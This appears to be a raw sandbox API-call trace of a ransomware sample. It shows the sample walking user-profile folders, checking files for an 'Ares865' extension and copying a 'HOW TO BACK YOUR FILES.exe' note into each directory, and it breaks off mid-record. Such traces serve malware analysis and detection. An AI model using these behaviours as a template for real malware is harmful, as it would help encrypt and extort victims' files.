lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.470] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.470] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aad5d60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.470] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.470] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.470] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe80 | out: hHeap=0x2b0000) returned 1 [0042.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.470] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 114 [0042.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0042.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.471] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.471] GetLastError () returned 0x0 [0042.471] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.471] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.471] CloseHandle (hObject=0x118) returned 1 [0042.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.471] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.471] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.472] lstrcpyW (in: lpString1=0x2e2e946, lpString2="00010C6E" | out: lpString1="00010C6E") returned="00010C6E" [0042.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf8) returned 0x2cbe80 [0042.472] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.472] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.472] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.472] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4aafbec0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.472] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.472] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2408 [0042.472] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe80 | out: hHeap=0x2b0000) returned 1 [0042.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.472] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 123 [0042.472] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.472] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.472] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.473] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.473] GetLastError () returned 0x0 [0042.473] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.473] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.473] CloseHandle (hObject=0x118) returned 1 [0042.473] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.473] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.473] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.473] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.473] lstrcpyW (in: lpString1=0x2e2e958, lpString2="01_Music_auto_rated_at_5_stars.wpl" | out: lpString1="01_Music_auto_rated_at_5_stars.wpl") returned="01_Music_auto_rated_at_5_stars.wpl" [0042.473] lstrlenW (lpString="01_Music_auto_rated_at_5_stars.wpl") returned 34 [0042.473] lstrlenW (lpString="Ares865") returned 7 [0042.473] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.473] lstrcpyW (in: lpString1=0x2e2e958, lpString2="02_Music_added_in_the_last_month.wpl" | out: lpString1="02_Music_added_in_the_last_month.wpl") returned="02_Music_added_in_the_last_month.wpl" [0042.473] lstrlenW (lpString="02_Music_added_in_the_last_month.wpl") returned 36 [0042.473] lstrlenW (lpString="Ares865") returned 7 [0042.473] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="03_Music_rated_at_4_or_5_stars.wpl" | out: lpString1="03_Music_rated_at_4_or_5_stars.wpl") returned="03_Music_rated_at_4_or_5_stars.wpl" [0042.474] lstrlenW (lpString="03_Music_rated_at_4_or_5_stars.wpl") returned 34 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="04_Music_played_in_the_last_month.wpl" | out: lpString1="04_Music_played_in_the_last_month.wpl") returned="04_Music_played_in_the_last_month.wpl" [0042.474] lstrlenW (lpString="04_Music_played_in_the_last_month.wpl") returned 37 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="05_Pictures_taken_in_the_last_month.wpl" | out: lpString1="05_Pictures_taken_in_the_last_month.wpl") returned="05_Pictures_taken_in_the_last_month.wpl" [0042.474] lstrlenW (lpString="05_Pictures_taken_in_the_last_month.wpl") returned 39 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="nth.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="06_Pictures_rated_4_or_5_stars.wpl" | out: lpString1="06_Pictures_rated_4_or_5_stars.wpl") returned="06_Pictures_rated_4_or_5_stars.wpl" [0042.474] lstrlenW (lpString="06_Pictures_rated_4_or_5_stars.wpl") returned 34 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="07_TV_recorded_in_the_last_week.wpl" | out: lpString1="07_TV_recorded_in_the_last_week.wpl") returned="07_TV_recorded_in_the_last_week.wpl" [0042.474] lstrlenW (lpString="07_TV_recorded_in_the_last_week.wpl") returned 35 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="eek.wpl", lpString2="Ares865") returned 1 [0042.474] lstrcpyW (in: lpString1=0x2e2e958, lpString2="08_Video_rated_at_4_or_5_stars.wpl" | out: lpString1="08_Video_rated_at_4_or_5_stars.wpl") returned="08_Video_rated_at_4_or_5_stars.wpl" [0042.474] lstrlenW (lpString="08_Video_rated_at_4_or_5_stars.wpl") returned 34 [0042.474] lstrlenW (lpString="Ares865") returned 7 [0042.474] lstrcmpiW (lpString1="ars.wpl", lpString2="Ares865") returned 1 [0042.475] lstrcpyW (in: lpString1=0x2e2e958, lpString2="09_Music_played_the_most.wpl" | out: lpString1="09_Music_played_the_most.wpl") returned="09_Music_played_the_most.wpl" [0042.475] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0042.475] lstrlenW (lpString="Ares865") returned 7 [0042.475] lstrcmpiW (lpString1="ost.wpl", lpString2="Ares865") returned 1 [0042.475] lstrcpyW (in: lpString1=0x2e2e958, lpString2="10_All_Music.wpl" | out: lpString1="10_All_Music.wpl") returned="10_All_Music.wpl" [0042.475] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0042.475] lstrlenW (lpString="Ares865") returned 7 [0042.475] lstrcmpiW (lpString1="sic.wpl", lpString2="Ares865") returned 1 [0042.475] lstrcpyW (in: lpString1=0x2e2e958, lpString2="11_All_Pictures.wpl" | out: lpString1="11_All_Pictures.wpl") returned="11_All_Pictures.wpl" [0042.475] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0042.475] lstrlenW (lpString="Ares865") returned 7 [0042.475] lstrcmpiW (lpString1="res.wpl", lpString2="Ares865") returned 1 [0042.475] lstrcpyW (in: lpString1=0x2e2e958, lpString2="12_All_Video.wpl" | out: lpString1="12_All_Video.wpl") returned="12_All_Video.wpl" [0042.475] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0042.475] lstrlenW (lpString="Ares865") returned 7 [0042.475] lstrcmpiW (lpString1="deo.wpl", lpString2="Ares865") returned 1 [0042.475] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0042.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.475] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned 98 [0042.475] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.475] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.475] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.476] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.476] GetLastError () returned 0x0 [0042.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.476] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.476] CloseHandle (hObject=0x118) returned 1 [0042.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.476] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.476] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.476] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.476] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.477] lstrcpyW (in: lpString1=0x2e2e926, lpString2="brndlog.bak.Ares865" | out: lpString1="brndlog.bak.Ares865") returned="brndlog.bak.Ares865" [0042.477] lstrlenW (lpString="brndlog.bak.Ares865") returned 19 [0042.477] lstrlenW (lpString="Ares865") returned 7 [0042.477] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0042.477] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0042.477] lstrcmpiW (lpString1="brndlog.txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.477] lstrcmpiW (lpString1="brndlog.txt", lpString2="aoldtz.exe") returned 1 [0042.477] lstrcpyW (in: lpString1=0x2e2e926, lpString2="brndlog.txt" | out: lpString1="brndlog.txt") returned="brndlog.txt" [0042.477] lstrlenW (lpString="brndlog.txt") returned 11 [0042.477] lstrlenW (lpString="Ares865") returned 7 [0042.477] lstrcmpiW (lpString1="log.txt", lpString2="Ares865") returned 1 [0042.477] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbaf0 | out: hHeap=0x2b0000) returned 1 [0042.477] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.477] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned 92 [0042.477] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.477] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.477] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.478] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.478] GetLastError () returned 0x0 [0042.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.478] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.478] CloseHandle (hObject=0x118) returned 1 [0042.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.478] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.478] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.478] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.478] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.478] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4330 | out: hHeap=0x2b0000) returned 1 [0042.478] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0042.478] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 101 [0042.478] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.478] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.479] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.479] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.479] GetLastError () returned 0x0 [0042.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.479] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.479] CloseHandle (hObject=0x118) returned 1 [0042.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.479] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.479] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, 